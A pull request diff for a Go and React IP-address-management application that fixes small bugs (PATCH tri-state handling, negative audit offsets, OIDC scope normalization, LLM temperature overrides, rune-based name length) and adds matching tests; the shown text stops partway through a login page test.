### PR TITLE
Fix low-priority findings across UI and backend

### DIFF
--- a/internal/api/pool_account_patch_test.go
+++ b/internal/api/pool_account_patch_test.go
@@ -1,0 +1,152 @@
+package api
+
+import (
+	"encoding/json"
+	stdhttp "net/http"
+	"strconv"
+	"testing"
+
+	"cloudpam/internal/domain"
+)
+
+// TestPatchPoolAccountIDTriState locks the three wire states that
+// PATCH /api/v1/pools/{id} distinguishes for account_id:
+//
+//	key absent        -> keep the current assignment
+//	key present, null -> clear the assignment
+//	key present, N    -> assign account N
+//
+// The handler resolves these by inspecting key presence in the raw body, so
+// domain.UpdatePool only ever receives an already-resolved value. Adding
+// `omitempty` to domain.UpdatePool.AccountID would suggest nil means "absent",
+// which contradicts the store contract that nil clears the column.
+func TestPatchPoolAccountIDTriState(t *testing.T) {
+	srv, _ := setupTestServer()
+
+	rr := doJSON(t, srv.mux, stdhttp.MethodPost, "/api/v1/accounts",
+		`{"key":"aws:111111111111","name":"acct-one"}`, stdhttp.StatusCreated)
+	var acct struct {
+		ID int64 `json:"id"`
+	}
+	if err := json.Unmarshal(rr.Body.Bytes(), &acct); err != nil {
+		t.Fatalf("unmarshal account: %v", err)
+	}
+
+	rr = doJSON(t, srv.mux, stdhttp.MethodPost, "/api/v1/pools",
+		`{"name":"root","cidr":"10.0.0.0/16","account_id":`+strconv.FormatInt(acct.ID, 10)+`}`,
+		stdhttp.StatusCreated)
+	var pool poolDTO
+	if err := json.Unmarshal(rr.Body.Bytes(), &pool); err != nil {
+		t.Fatalf("unmarshal pool: %v", err)
+	}
+	if pool.AccountID == nil || *pool.AccountID != acct.ID {
+		t.Fatalf("expected pool to start assigned to account %d, got %v", acct.ID, pool.AccountID)
+	}
+
+	path := "/api/v1/pools/" + strconv.FormatInt(pool.ID, 10)
+
+	patch := func(body string) poolDTO {
+		t.Helper()
+		res := doJSON(t, srv.mux, stdhttp.MethodPatch, path, body, stdhttp.StatusOK)
+		var got poolDTO
+		if err := json.Unmarshal(res.Body.Bytes(), &got); err != nil {
+			t.Fatalf("unmarshal patched pool: %v", err)
+		}
+		return got
+	}
+
+	t.Run("absent key keeps the current account", func(t *testing.T) {
+		got := patch(`{"name":"renamed"}`)
+		if got.Name != "renamed" {
+			t.Errorf("expected name renamed, got %q", got.Name)
+		}
+		if got.AccountID == nil || *got.AccountID != acct.ID {
+			t.Fatalf("expected account %d to be preserved, got %v", acct.ID, got.AccountID)
+		}
+	})
+
+	t.Run("explicit null clears the account", func(t *testing.T) {
+		got := patch(`{"account_id":null}`)
+		if got.AccountID != nil {
+			t.Fatalf("expected account to be cleared, got %v", *got.AccountID)
+		}
+	})
+
+	t.Run("absent key keeps the cleared state", func(t *testing.T) {
+		got := patch(`{"name":"renamed-again"}`)
+		if got.AccountID != nil {
+			t.Fatalf("expected account to stay cleared, got %v", *got.AccountID)
+		}
+	})
+
+	t.Run("numeric value assigns the account", func(t *testing.T) {
+		got := patch(`{"account_id":` + strconv.FormatInt(acct.ID, 10) + `}`)
+		if got.AccountID == nil || *got.AccountID != acct.ID {
+			t.Fatalf("expected account %d to be assigned, got %v", acct.ID, got.AccountID)
+		}
+	})
+}
+
+// TestUpdatePoolAccountIDAlwaysSerialized documents why
+// domain.UpdatePool.AccountID deliberately has no `omitempty`.
+//
+// The type is an internal, already-resolved command: nil means "clear the
+// account", which every store implements as writing NULL. `omitempty` would
+// erase that meaning from the marshaled form, making a clear indistinguishable
+// from an untouched field for any Go client that used this type as a request
+// body.
+func TestUpdatePoolAccountIDAlwaysSerialized(t *testing.T) {
+	name := "example"
+
+	b, err := json.Marshal(domain.UpdatePool{Name: &name})
+	if err != nil {
+		t.Fatalf("marshal: %v", err)
+	}
+
+	var got map[string]json.RawMessage
+	if err := json.Unmarshal(b, &got); err != nil {
+		t.Fatalf("unmarshal: %v", err)
+	}
+
+	raw, ok := got["account_id"]
+	if !ok {
+		t.Fatal("account_id must always be serialized; a nil AccountID means 'clear', not 'unset'")
+	}
+	if string(raw) != "null" {
+		t.Errorf("expected account_id null for a nil AccountID, got %s", raw)
+	}
+
+	// Fields that genuinely are optional stay omitted.
+	for _, optional := range []string{"type", "status", "description", "tags"} {
+		if _, present := got[optional]; present {
+			t.Errorf("expected %q to be omitted when unset", optional)
+		}
+	}
+}
+
+// TestUpdatePoolSchemaDoesNotRequireAccountID guards the only place the JSON
+// tag is externally visible: the generated OpenAPI component. Pointer fields
+// are never marked required, so the emitted schema is identical with or
+// without `omitempty` — the tag change the tracker proposes would not alter
+// the published contract at all.
+func TestUpdatePoolSchemaDoesNotRequireAccountID(t *testing.T) {
+	var schema *openAPISchema
+	for _, def := range openAPIComponentTypes() {
+		if def.name == "UpdatePool" {
+			schema = schemaFromType(def.typ, def.name)
+			break
+		}
+	}
+	if schema == nil {
+		t.Fatal("UpdatePool component not registered")
+	}
+
+	if _, ok := schema.Properties["account_id"]; !ok {
+		t.Fatal("expected account_id property in the UpdatePool schema")
+	}
+	for _, req := range schema.Required {
+		if req == "account_id" {
+			t.Fatal("account_id must not be a required request property")
+		}
+	}
+}

--- a/internal/audit/audit_test.go
+++ b/internal/audit/audit_test.go
@@ -590,3 +590,50 @@ func TestWithMaxEvents(t *testing.T) {
 		})
 	}
 }
+
+func TestMemoryAuditLogger_List_NegativeOffset(t *testing.T) {
+	logger := NewMemoryAuditLogger()
+	ctx := context.Background()
+
+	for i := 0; i < 5; i++ {
+		event := &AuditEvent{
+			Actor:        "cpam_test",
+			ActorType:    ActorTypeAPIKey,
+			Action:       ActionCreate,
+			ResourceType: ResourcePool,
+			ResourceID:   string(rune('A' + i)),
+			StatusCode:   201,
+		}
+		if err := logger.Log(ctx, event); err != nil {
+			t.Fatalf("Log() error = %v", err)
+		}
+	}
+
+	// A negative offset must be clamped to the start of the result set rather
+	// than panicking on the underlying slice expression.
+	events, total, err := logger.List(ctx, ListOptions{Limit: 3, Offset: -10})
+	if err != nil {
+		t.Fatalf("List() error = %v", err)
+	}
+	if total != 5 {
+		t.Errorf("expected total 5, got %d", total)
+	}
+	if len(events) != 3 {
+		t.Errorf("expected 3 events, got %d", len(events))
+	}
+}
+
+func TestMemoryAuditLogger_List_NegativeOffsetEmptyLog(t *testing.T) {
+	logger := NewMemoryAuditLogger()
+
+	events, total, err := logger.List(context.Background(), ListOptions{Offset: -1})
+	if err != nil {
+		t.Fatalf("List() error = %v", err)
+	}
+	if total != 0 {
+		t.Errorf("expected total 0, got %d", total)
+	}
+	if len(events) != 0 {
+		t.Errorf("expected 0 events, got %d", len(events))
+	}
+}

--- a/internal/audit/memory.go
+++ b/internal/audit/memory.go
@@ -107,6 +107,9 @@ func (m *MemoryAuditLogger) List(ctx context.Context, opts ListOptions) ([]*Audi
 	}
 
 	start := opts.Offset
+	if start < 0 {
+		start = 0
+	}
 	if start > len(filtered) {
 		start = len(filtered)
 	}

--- a/internal/auth/oidc/provider.go
+++ b/internal/auth/oidc/provider.go
@@ -3,6 +3,7 @@ package oidc
 import (
 	"context"
 	"fmt"
+	"strings"
 
 	gooidc "github.com/coreos/go-oidc/v3/oidc"
 	"golang.org/x/oauth2"
@@ -31,10 +32,7 @@ func NewProvider(ctx context.Context, cfg ProviderConfig) (*Provider, error) {
 		return nil, fmt.Errorf("oidc discovery: %w", err)
 	}
 
-	scopes := cfg.Scopes
-	if len(scopes) == 0 {
-		scopes = []string{gooidc.ScopeOpenID, "profile", "email"}
-	}
+	scopes := normalizeScopes(cfg.Scopes)
 
 	oauth2Cfg := oauth2.Config{
 		ClientID:     cfg.ClientID,
@@ -53,6 +51,46 @@ func NewProvider(ctx context.Context, cfg ProviderConfig) (*Provider, error) {
 		verifier:     verifier,
 		oauth2Config: oauth2Cfg,
 	}, nil
+}
+
+// normalizeScopes trims and de-duplicates the configured scopes and guarantees
+// that "openid" is requested. Without it the IdP performs a plain OAuth2
+// authorization and returns no id_token, which makes Exchange fail.
+func normalizeScopes(scopes []string) []string {
+	if len(scopes) == 0 {
+		return []string{gooidc.ScopeOpenID, "profile", "email"}
+	}
+
+	out := make([]string, 0, len(scopes)+1)
+	seen := make(map[string]struct{}, len(scopes)+1)
+	hasOpenID := false
+	for _, scope := range scopes {
+		scope = strings.TrimSpace(scope)
+		if scope == "" {
+			continue
+		}
+		if _, dup := seen[scope]; dup {
+			continue
+		}
+		seen[scope] = struct{}{}
+		if scope == gooidc.ScopeOpenID {
+			hasOpenID = true
+		}
+		out = append(out, scope)
+	}
+
+	if len(out) == 0 {
+		return []string{gooidc.ScopeOpenID, "profile", "email"}
+	}
+	if !hasOpenID {
+		out = append([]string{gooidc.ScopeOpenID}, out...)
+	}
+	return out
+}
+
+// Scopes returns the normalized scopes that will be requested at the IdP.
+func (p *Provider) Scopes() []string {
+	return append([]string(nil), p.oauth2Config.Scopes...)
 }
 
 // AuthCodeURL generates the IdP redirect URL with the given state and options.

--- a/internal/auth/oidc/provider_test.go
+++ b/internal/auth/oidc/provider_test.go
@@ -204,3 +204,69 @@ func TestExchange_ValidCode(t *testing.T) {
 		t.Errorf("expected 2 groups, got %d", len(claims.Groups))
 	}
 }
+
+func TestNewProvider_CustomScopesAlwaysIncludeOpenID(t *testing.T) {
+	srv, _ := mockOIDCServer(t)
+	defer srv.Close()
+
+	tests := []struct {
+		name  string
+		given []string
+		want  []string
+	}{
+		{
+			name:  "defaults when unset",
+			given: nil,
+			want:  []string{"openid", "profile", "email"},
+		},
+		{
+			name:  "custom scopes missing openid",
+			given: []string{"profile", "groups"},
+			want:  []string{"openid", "profile", "groups"},
+		},
+		{
+			name:  "openid already present is not duplicated",
+			given: []string{"openid", "email"},
+			want:  []string{"openid", "email"},
+		},
+		{
+			name:  "blank and duplicate entries are dropped",
+			given: []string{" ", "profile", "profile", ""},
+			want:  []string{"openid", "profile"},
+		},
+		{
+			name:  "only blanks falls back to defaults",
+			given: []string{"", "   "},
+			want:  []string{"openid", "profile", "email"},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			prov, err := NewProvider(context.Background(), ProviderConfig{
+				IssuerURL:    srv.URL,
+				ClientID:     "test-client-id",
+				ClientSecret: "test-secret",
+				RedirectURL:  "http://localhost:8080/auth/callback",
+				Scopes:       tt.given,
+			})
+			if err != nil {
+				t.Fatalf("NewProvider: %v", err)
+			}
+
+			got := prov.Scopes()
+			if len(got) != len(tt.want) {
+				t.Fatalf("scopes = %v, want %v", got, tt.want)
+			}
+			for i := range tt.want {
+				if got[i] != tt.want[i] {
+					t.Fatalf("scopes = %v, want %v", got, tt.want)
+				}
+			}
+
+			if !strings.Contains(prov.AuthCodeURL("state"), "openid") {
+				t.Errorf("AuthCodeURL missing openid scope: %s", prov.AuthCodeURL("state"))
+			}
+		})
+	}
+}

--- a/internal/domain/types.go
+++ b/internal/domain/types.go
@@ -131,9 +131,15 @@ type CreatePool struct {
 	Tags        map[string]string `json:"tags,omitempty"`
 }
 
-// UpdatePool is the input for updating a pool.
+// UpdatePool is the input for updating a pool. It is an already-resolved
+// command, not a wire type: the PATCH handler inspects key presence in the raw
+// request body and passes the resolved value in here.
 type UpdatePool struct {
-	Name        *string            `json:"name,omitempty"`
+	Name *string `json:"name,omitempty"`
+	// AccountID intentionally has no omitempty. Unlike the other fields, nil
+	// does not mean "leave unchanged" — every store writes it unconditionally,
+	// so nil clears the assignment. Omitting it from the marshaled form would
+	// make "clear the account" indistinguishable from "not specified".
 	AccountID   *int64             `json:"account_id"`
 	Type        *PoolType          `json:"type,omitempty"`
 	Status      *PoolStatus        `json:"status,omitempty"`

--- a/internal/planning/llm/openai.go
+++ b/internal/planning/llm/openai.go
@@ -81,9 +81,9 @@ func (p *OpenAIProvider) Complete(ctx context.Context, messages []Message, opts 
 	if maxTokens == 0 {
 		maxTokens = p.cfg.MaxTokens
 	}
-	temp := opts.Temperature
-	if temp == 0 {
-		temp = p.cfg.Temperature
+	temp := p.cfg.Temperature
+	if opts.Temperature != nil {
+		temp = *opts.Temperature
 	}
 
 	oaiMsgs := make([]openaiMessage, len(messages))
@@ -152,9 +152,9 @@ func (p *OpenAIProvider) StreamComplete(ctx context.Context, messages []Message,
 	if maxTokens == 0 {
 		maxTokens = p.cfg.MaxTokens
 	}
-	temp := opts.Temperature
-	if temp == 0 {
-		temp = p.cfg.Temperature
+	temp := p.cfg.Temperature
+	if opts.Temperature != nil {
+		temp = *opts.Temperature
 	}
 
 	oaiMsgs := make([]openaiMessage, len(messages))

--- a/internal/planning/llm/openai_test.go
+++ b/internal/planning/llm/openai_test.go
@@ -232,6 +232,14 @@ func TestOpenAIProviderAPIError(t *testing.T) {
 }
 
 func TestConfigFromEnv(t *testing.T) {
+	// Clear the LLM environment so ambient values in the caller's shell cannot
+	// influence the defaults under test. t.Setenv restores the originals.
+	t.Setenv("CLOUDPAM_LLM_API_KEY", "")
+	t.Setenv("CLOUDPAM_LLM_MODEL", "")
+	t.Setenv("CLOUDPAM_LLM_ENDPOINT", "")
+	t.Setenv("CLOUDPAM_LLM_MAX_TOKENS", "")
+	t.Setenv("CLOUDPAM_LLM_TEMPERATURE", "")
+
 	// Test defaults
 	cfg := ConfigFromEnv()
 	if cfg.Model != "gpt-4o" {
@@ -242,5 +250,58 @@ func TestConfigFromEnv(t *testing.T) {
 	}
 	if cfg.Temperature != 0.7 {
 		t.Errorf("expected default temperature 0.7, got %f", cfg.Temperature)
+	}
+}
+
+// captureTemperature runs a single completion against a stub server and returns
+// the temperature that was actually sent on the wire.
+func captureTemperature(t *testing.T, cfg Config, opts Options) float64 {
+	t.Helper()
+
+	var got float64
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		var req openaiRequest
+		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+			t.Errorf("decode request: %v", err)
+			return
+		}
+		got = req.Temperature
+
+		w.Header().Set("Content-Type", "application/json")
+		resp := openaiResponse{
+			Choices: []struct {
+				Message      openaiMessage `json:"message"`
+				FinishReason string        `json:"finish_reason"`
+			}{
+				{Message: openaiMessage{Role: "assistant", Content: "ok"}, FinishReason: "stop"},
+			},
+		}
+		_ = json.NewEncoder(w).Encode(resp)
+	}))
+	defer ts.Close()
+
+	cfg.Endpoint = ts.URL + "/v1"
+	provider := NewOpenAIProvider(cfg)
+	if _, err := provider.Complete(context.Background(), []Message{{Role: "user", Content: "Hi"}}, opts); err != nil {
+		t.Fatalf("complete: %v", err)
+	}
+	return got
+}
+
+func TestOpenAIProviderTemperatureOverride(t *testing.T) {
+	cfg := Config{APIKey: "test-key", Model: "gpt-4o", MaxTokens: 1024, Temperature: 0.7}
+
+	zero := 0.0
+	if got := captureTemperature(t, cfg, Options{Temperature: &zero}); got != 0 {
+		t.Errorf("expected explicit temperature 0 to be sent, got %v", got)
+	}
+
+	custom := 0.25
+	if got := captureTemperature(t, cfg, Options{Temperature: &custom}); got != 0.25 {
+		t.Errorf("expected temperature 0.25, got %v", got)
+	}
+
+	if got := captureTemperature(t, cfg, Options{}); got != 0.7 {
+		t.Errorf("expected configured default temperature 0.7, got %v", got)
 	}
 }

--- a/internal/planning/llm/provider.go
+++ b/internal/planning/llm/provider.go
@@ -13,9 +13,12 @@ type Message struct {
 }
 
 // Options configures a single LLM completion request.
+// Unset fields fall back to the provider's configured defaults.
 type Options struct {
-	MaxTokens   int64
-	Temperature float64
+	MaxTokens int64
+	// Temperature is a pointer so that an explicit 0 (fully deterministic
+	// sampling) is distinguishable from "not specified".
+	Temperature *float64
 }
 
 // Response is the result of a non-streaming completion.

--- a/internal/validation/validation.go
+++ b/internal/validation/validation.go
@@ -8,6 +8,7 @@ import (
 	"regexp"
 	"strings"
 	"unicode"
+	"unicode/utf8"
 )
 
 // Validation error types for specific error handling.
@@ -354,7 +355,11 @@ func ValidateNameWithOptions(name string, opts NameOptions) error {
 		minLen = opts.MinLength
 	}
 
-	if len(name) > maxLen {
+	// Length limits are expressed in characters, so count runes rather than
+	// bytes; otherwise multi-byte names are rejected far below the limit.
+	nameLen := utf8.RuneCountInString(name)
+
+	if nameLen > maxLen {
 		return &NameError{
 			Name:   name,
 			Reason: fmt.Sprintf("exceeds maximum length of %d characters", maxLen),
@@ -362,7 +367,7 @@ func ValidateNameWithOptions(name string, opts NameOptions) error {
 		}
 	}
 
-	if len(name) < minLen {
+	if nameLen < minLen {
 		return &NameError{
 			Name:   name,
 			Reason: fmt.Sprintf("must be at least %d characters", minLen),

--- a/internal/validation/validation_test.go
+++ b/internal/validation/validation_test.go
@@ -635,3 +635,63 @@ func BenchmarkValidateName(b *testing.B) {
 		_ = ValidateName("Production VPC")
 	}
 }
+
+func TestValidateNameCountsRunesNotBytes(t *testing.T) {
+	// Each of these characters is multi-byte in UTF-8, so a byte-based length
+	// check would reject a name that is well within the character limit.
+	tests := []struct {
+		name  string
+		value string
+		opts  NameOptions
+		valid bool
+	}{
+		{
+			name:  "non-ascii name at max length",
+			value: strings.Repeat("é", MaxNameLength),
+			opts:  NameOptions{},
+			valid: true,
+		},
+		{
+			name:  "non-ascii name one over max length",
+			value: strings.Repeat("é", MaxNameLength+1),
+			opts:  NameOptions{},
+			valid: false,
+		},
+		{
+			name:  "multibyte cjk at custom max length",
+			value: strings.Repeat("網", 10),
+			opts:  NameOptions{MaxLength: 10},
+			valid: true,
+		},
+		{
+			name:  "multibyte cjk over custom max length",
+			value: strings.Repeat("網", 11),
+			opts:  NameOptions{MaxLength: 10},
+			valid: false,
+		},
+		{
+			name:  "emoji satisfies min length",
+			value: "🚀🚀🚀",
+			opts:  NameOptions{MinLength: 3},
+			valid: true,
+		},
+		{
+			name:  "emoji below min length",
+			value: "🚀🚀",
+			opts:  NameOptions{MinLength: 3},
+			valid: false,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateNameWithOptions(tt.value, tt.opts)
+			if tt.valid && err != nil {
+				t.Errorf("ValidateNameWithOptions() unexpected error = %v", err)
+			}
+			if !tt.valid && err == nil {
+				t.Error("ValidateNameWithOptions() expected error, got nil")
+			}
+		})
+	}
+}

--- a/ui/src/__tests__/BlocksPageEditDescription.test.tsx
+++ b/ui/src/__tests__/BlocksPageEditDescription.test.tsx
@@ -1,0 +1,129 @@
+import { fireEvent, render, screen, waitFor } from '@testing-library/react'
+import { MemoryRouter } from 'react-router-dom'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import BlocksPage from '../pages/BlocksPage'
+import type { Block } from '../api/types'
+
+const mockGet = vi.hoisted(() => vi.fn())
+const mockPatch = vi.hoisted(() => vi.fn())
+const mockDel = vi.hoisted(() => vi.fn())
+const mockUseBlocks = vi.hoisted(() => vi.fn())
+const mockUseAccounts = vi.hoisted(() => vi.fn())
+const mockShowToast = vi.hoisted(() => vi.fn())
+
+vi.mock('../api/client', () => ({
+  get: (path: string) => mockGet(path),
+  patch: (path: string, body: unknown) => mockPatch(path, body),
+  del: (path: string) => mockDel(path),
+}))
+
+vi.mock('../hooks/useBlocks', () => ({
+  useBlocks: () => mockUseBlocks(),
+}))
+
+vi.mock('../hooks/useAccounts', () => ({
+  useAccounts: () => mockUseAccounts(),
+}))
+
+vi.mock('../hooks/useToast', () => ({
+  useToast: () => ({ showToast: mockShowToast }),
+}))
+
+const block: Block = {
+  id: 42,
+  name: 'prod-subnet',
+  cidr: '10.0.1.0/24',
+  type: 'subnet',
+  status: 'active',
+  created_at: '2026-01-01T00:00:00Z',
+}
+
+function renderPage() {
+  return render(
+    <MemoryRouter>
+      <BlocksPage />
+    </MemoryRouter>,
+  )
+}
+
+async function openEditModal() {
+  renderPage()
+  fireEvent.click(screen.getByTitle('Edit block'))
+  // Wait for the pool detail fetch that seeds the description field.
+  await waitFor(() => {
+    expect(mockGet).toHaveBeenCalledWith('/api/v1/pools/42')
+  })
+  return screen.getByPlaceholderText('Optional description...') as HTMLTextAreaElement
+}
+
+describe('BlocksPage edit block description', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    mockUseBlocks.mockReturnValue({
+      blocks: [block],
+      total: 1,
+      loading: false,
+      error: null,
+      fetchBlocks: vi.fn(),
+    })
+    mockUseAccounts.mockReturnValue({ accounts: [], fetchAccounts: vi.fn() })
+    mockPatch.mockResolvedValue({})
+    mockGet.mockResolvedValue({ ...block, description: 'original notes' })
+  })
+
+  it('loads the current description into the edit form', async () => {
+    const textarea = await openEditModal()
+
+    await waitFor(() => {
+      expect(textarea.value).toBe('original notes')
+    })
+  })
+
+  it('sends an empty description when the field is cleared', async () => {
+    const textarea = await openEditModal()
+    await waitFor(() => expect(textarea.value).toBe('original notes'))
+
+    fireEvent.change(textarea, { target: { value: '' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Save' }))
+
+    await waitFor(() => {
+      expect(mockPatch).toHaveBeenCalledWith('/api/v1/pools/42', { description: '' })
+    })
+  })
+
+  it('sends an edited description', async () => {
+    const textarea = await openEditModal()
+    await waitFor(() => expect(textarea.value).toBe('original notes'))
+
+    fireEvent.change(textarea, { target: { value: 'updated notes' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Save' }))
+
+    await waitFor(() => {
+      expect(mockPatch).toHaveBeenCalledWith('/api/v1/pools/42', { description: 'updated notes' })
+    })
+  })
+
+  it('omits description entirely when it was not touched', async () => {
+    const textarea = await openEditModal()
+    await waitFor(() => expect(textarea.value).toBe('original notes'))
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save' }))
+
+    await waitFor(() => {
+      expect(mockPatch).toHaveBeenCalledWith('/api/v1/pools/42', {})
+    })
+  })
+
+  it('does not send a spurious clear when the block never had a description', async () => {
+    mockGet.mockResolvedValue({ ...block, description: undefined })
+
+    const textarea = await openEditModal()
+    expect(textarea.value).toBe('')
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save' }))
+
+    await waitFor(() => {
+      expect(mockPatch).toHaveBeenCalledWith('/api/v1/pools/42', {})
+    })
+  })
+})

--- a/ui/src/__tests__/ChangelogPageUpdatesLink.test.tsx
+++ b/ui/src/__tests__/ChangelogPageUpdatesLink.test.tsx
@@ -1,0 +1,75 @@
+import { render, screen, waitFor } from '@testing-library/react'
+import { MemoryRouter } from 'react-router-dom'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import ChangelogPage from '../pages/ChangelogPage'
+
+const mockUseAuth = vi.hoisted(() => vi.fn())
+const mockGetChangelogMarkdown = vi.hoisted(() => vi.fn())
+const mockGetSystemInfo = vi.hoisted(() => vi.fn())
+
+vi.mock('../hooks/useAuth', () => ({
+  useAuth: () => mockUseAuth(),
+}))
+
+vi.mock('../api/client', () => ({
+  getChangelogMarkdown: () => mockGetChangelogMarkdown(),
+  getSystemInfo: () => mockGetSystemInfo(),
+}))
+
+// Mirrors how App.tsx gates /config/updates: settings:read, with admin implied.
+function auth(permissions: string[], role = 'viewer') {
+  return {
+    role,
+    permissions,
+    hasPermission: (p: string) => role === 'admin' || permissions.includes(p),
+  }
+}
+
+function renderPage() {
+  return render(
+    <MemoryRouter>
+      <ChangelogPage />
+    </MemoryRouter>,
+  )
+}
+
+async function updatesLink() {
+  await waitFor(() => {
+    expect(mockGetChangelogMarkdown).toHaveBeenCalled()
+  })
+  return screen.queryByRole('link', { name: 'Updates' })
+}
+
+describe('ChangelogPage Updates link', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    mockGetChangelogMarkdown.mockResolvedValue('# Changelog\n\n## [0.9.0] - 2026-03-31\n\n### Added\n- Thing\n')
+    mockGetSystemInfo.mockResolvedValue({ version: '0.9.0' })
+  })
+
+  it('shows the link to a non-admin who holds settings:read', async () => {
+    mockUseAuth.mockReturnValue(auth(['settings:read']))
+
+    renderPage()
+
+    const link = await updatesLink()
+    expect(link).not.toBeNull()
+    expect(link?.getAttribute('href')).toBe('/config/updates')
+  })
+
+  it('shows the link to an admin', async () => {
+    mockUseAuth.mockReturnValue(auth([], 'admin'))
+
+    renderPage()
+
+    expect(await updatesLink()).not.toBeNull()
+  })
+
+  it('hides the link from a user without settings:read', async () => {
+    mockUseAuth.mockReturnValue(auth(['pools:read']))
+
+    renderPage()
+
+    expect(await updatesLink()).toBeNull()
+  })
+})

--- a/ui/src/__tests__/DimensionsStep.test.tsx
+++ b/ui/src/__tests__/DimensionsStep.test.tsx
@@ -1,0 +1,67 @@
+import { render, screen } from '@testing-library/react'
+import { describe, expect, it, vi } from 'vitest'
+import DimensionsStep from '../wizard/steps/DimensionsStep'
+import type { Dimensions } from '../wizard/steps/DimensionsStep'
+
+const dimensions: Dimensions = {
+  regions: ['us-east-1', 'eu-west-1', 'ap-south-1'],
+  environments: ['prod', 'dev'],
+  accountTiers: ['app'],
+  accountsPerEnv: 4,
+  growthYears: 2,
+}
+
+function renderStep(strategy: string) {
+  return render(
+    <DimensionsStep dimensions={dimensions} setDimensions={vi.fn()} strategy={strategy} />,
+  )
+}
+
+function capacityValues() {
+  // The tip renders "<allocations>" then "<allocations * growthYears>".
+  return Array.from(document.querySelectorAll('strong')).map(el => el.textContent)
+}
+
+describe('DimensionsStep capacity estimate', () => {
+  it('counts regions for region-first, which allocates per region', () => {
+    renderStep('region-first')
+
+    // 3 regions x 2 environments x 4 accounts = 24, x2 growth = 48
+    expect(capacityValues()).toEqual(['24', '48'])
+  })
+
+  it('counts regions for environment-first, which also allocates per region', () => {
+    renderStep('environment-first')
+
+    expect(capacityValues()).toEqual(['24', '48'])
+  })
+
+  it('ignores regions for account-first, which does not allocate per region', () => {
+    renderStep('account-first')
+
+    // 2 environments x 4 accounts = 8, x2 growth = 16
+    expect(capacityValues()).toEqual(['8', '16'])
+  })
+})
+
+describe('DimensionsStep regions list visibility', () => {
+  it('shows the regions list for region-first', () => {
+    renderStep('region-first')
+
+    expect(screen.getByText('Regions')).toBeTruthy()
+    expect(screen.getByText('us-east-1')).toBeTruthy()
+  })
+
+  it('shows the regions list for environment-first, since the estimate depends on it', () => {
+    renderStep('environment-first')
+
+    expect(screen.getByText('Regions')).toBeTruthy()
+  })
+
+  it('hides the regions list for account-first', () => {
+    renderStep('account-first')
+
+    expect(screen.queryByText('Regions')).toBeNull()
+    expect(screen.queryByText('us-east-1')).toBeNull()
+  })
+})

--- a/ui/src/__tests__/LoginPage.test.tsx
+++ b/ui/src/__tests__/LoginPage.test.tsx
@@ -1,0 +1,230 @@
+import { fireEvent, render, screen, waitFor } from '@testing-library/react'
+import { MemoryRouter } from 'react-router-dom'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import LoginPage from '../pages/LoginPage'
+import type { AuthContextValue } from '../hooks/useAuth'
+
+interface TestProvider {
+  id: string
+  name: string
+}
+
+const mockUseAuth = vi.hoisted(() => vi.fn())
+const mockUseOIDCProviders = vi.hoisted(() => vi.fn())
+const mockNavigate = vi.hoisted(() => vi.fn())
+
+vi.mock('../hooks/useAuth', () => ({
+  useAuth: () => mockUseAuth(),
+}))
+
+vi.mock('../hooks/useOIDCProviders', () => ({
+  useOIDCProviders: () => mockUseOIDCProviders(),
+}))
+
+vi.mock('react-router-dom', async () => {
+  const actual = await vi.importActual<typeof import('react-router-dom')>('react-router-dom')
+  return { ...actual, useNavigate: () => mockNavigate }
+})
+
+const loginWithPassword = vi.fn()
+
+function auth(overrides: Partial<AuthContextValue> = {}) {
+  return {
+    loginWithPassword,
+    isAuthenticated: false,
+    needsSetup: false,
+    authChecked: true,
+    localAuthEnabled: true,
+    ...overrides,
+  }
+}
+
+function providers(list: TestProvider[] = [], loading = false) {
+  return { providers: list, loading }
+}
+
+function renderPage() {
+  return render(
+    <MemoryRouter>
+      <LoginPage />
+    </MemoryRouter>,
+  )
+}
+
+async function signIn(username: string, password: string) {
+  fireEvent.change(screen.getByPlaceholderText('admin'), { target: { value: username } })
+  const passwordInput = document.querySelector('input[autocomplete="current-password"]') as HTMLInputElement
+  fireEvent.change(passwordInput, { target: { value: password } })
+  fireEvent.click(screen.getByRole('button', { name: 'Sign In' }))
+}
+
+describe('LoginPage auth routing', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    mockUseOIDCProviders.mockReturnValue(providers())
+  })
+
+  it('renders a loading placeholder until the auth config is known', () => {
+    mockUseAuth.mockReturnValue(auth({ authChecked: false }))
+
+    renderPage()
+
+    expect(screen.getByText('Loading...')).toBeTruthy()
+    expect(screen.queryByRole('button', { name: 'Sign In' })).toBeNull()
+    expect(mockNavigate).not.toHaveBeenCalled()
+  })
+
+  it('redirects to setup on a fresh install', () => {
+    mockUseAuth.mockReturnValue(auth({ needsSetup: true }))
+
+    renderPage()
+
+    expect(mockNavigate).toHaveBeenCalledWith('/setup', { replace: true })
+  })
+
+  it('redirects an already authenticated user to the dashboard', () => {
+    mockUseAuth.mockReturnValue(auth({ isAuthenticated: true }))
+
+    renderPage()
+
+    expect(mockNavigate).toHaveBeenCalledWith('/', { replace: true })
+  })
+
+  it('prefers the setup redirect over the authenticated redirect', () => {
+    mockUseAuth.mockReturnValue(auth({ needsSetup: true, isAuthenticated: true }))
+
+    renderPage()
+
+    expect(mockNavigate).toHaveBeenCalledWith('/setup', { replace: true })
+    expect(mockNavigate).not.toHaveBeenCalledWith('/', { replace: true })
+  })
+
+  it('stays put when unauthenticated and setup is complete', () => {
+    mockUseAuth.mockReturnValue(auth())
+
+    renderPage()
+
+    expect(mockNavigate).not.toHaveBeenCalled()
+    expect(screen.getByRole('button', { name: 'Sign In' })).toBeTruthy()
+  })
+})
+
+describe('LoginPage sign-in modes', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    mockUseAuth.mockReturnValue(auth())
+    mockUseOIDCProviders.mockReturnValue(providers())
+  })
+
+  it('shows the password form when local auth is enabled', () => {
+    renderPage()
+
+    expect(screen.getByPlaceholderText('admin')).toBeTruthy()
